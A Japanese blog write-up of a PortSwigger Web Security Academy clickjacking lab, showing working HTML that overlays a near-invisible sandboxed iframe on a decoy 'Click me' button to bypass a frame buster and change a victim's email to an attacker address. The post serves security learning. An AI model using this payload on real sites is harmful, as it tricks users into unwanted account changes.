shikata ga nai

Private? There is no such things.

Clickjacking with a frame buster scriptをやってみた

Hello there, ('ω')ノ

 

フレームバスタースクリプトを使用したクリックジャッキングを。

このラボは、Webサイトがフレーム化されるのを防ぐ。

フレームバスターによって保護されていて。

フレームバスターを回避するクリックジャッキング攻撃でメールアドレスを変更して。

 

まずは、ログインして。

 

f:id:ThisIsOne:20210405192423p:plain

 

メールアドレスの変更を。

 

f:id:ThisIsOne:20210405192508p:plain

 

メールアドレスを変更をするリクエストを確認して。

 

f:id:ThisIsOne:20210405192721p:plain

 

ソースコードを確認すると。

Updateボタンで、下記へ遷移するようで。

 /my-account/change-email

 

f:id:ThisIsOne:20210405222637p:plain

 

ただし、メールアドレスを変更するリクエストは下記のとおりで。

クリックジャッキングでUpdateをクリックさせるようにするためのページで。

 

f:id:ThisIsOne:20210405195633p:plain

 

エクスプロイトサーバーで、下記のHTMLを挿入して。

PortSwiggerのSolutionに書かれているパラメータだとうまくいかないので。

一部を変更して。

 

<style>
iframe {
position:relative;
width:700px;
height: 600px;
opacity: 0.0001;
z-index: 2;
}
div {
position:absolute;
top:485px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe sandbox="allow-forms"
src="https://ac6b1f1c1ffdc1b380c2389c005200a0.web-security-academy.net/my-account?id=wiener&email=hacker@attacker-website.com"></iframe>

 

f:id:ThisIsOne:20210405192848p:plain

 

わかりやすくするために透過する数値を変えてみて。

View exploiteで、Click meがUpdateボタンの上になるように位置を調整して。

 

 opacity: 0.4001;

 

f:id:ThisIsOne:20210405195117p:plain

 

Click meをクリックするといつもの画面遷移が。

 

f:id:ThisIsOne:20210405195410p:plain

 

あたらめてページを確認するとメールアドレスが変更されているももの。

なぜかクリアできないようで。

 

f:id:ThisIsOne:20210405195316p:plain

 

ちなみにメール変更のリクエストのメソッドを変更して。

 

f:id:ThisIsOne:20210406064130p:plain

 

下記のURLを組み込んでエクスプロイトに組み込んでみると。

 

 /my-account/change-email?email=user%40mail.com&csrf=g6ANNnKNwfu7JL9cSRElP5ssgcAbhZ8m

 

f:id:ThisIsOne:20210406064235p:plain

 

ページが表示されないのでボタンすら押せず。

 

f:id:ThisIsOne:20210406064026p:plain

 

idパラメータを除いて。

下記のURLを組み込んでエクスプロイトに組み込んで実行してみると。

なぜかクリアできたものの、実際にはメールアドレスは変更されず。

問題に対するサイトの作りに問題があるのではと。

 

 /my-account?email=hacker@attacker-website.com

 

f:id:ThisIsOne:20210406064418p:plain

 

Best regards, (^^ゞ

 

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain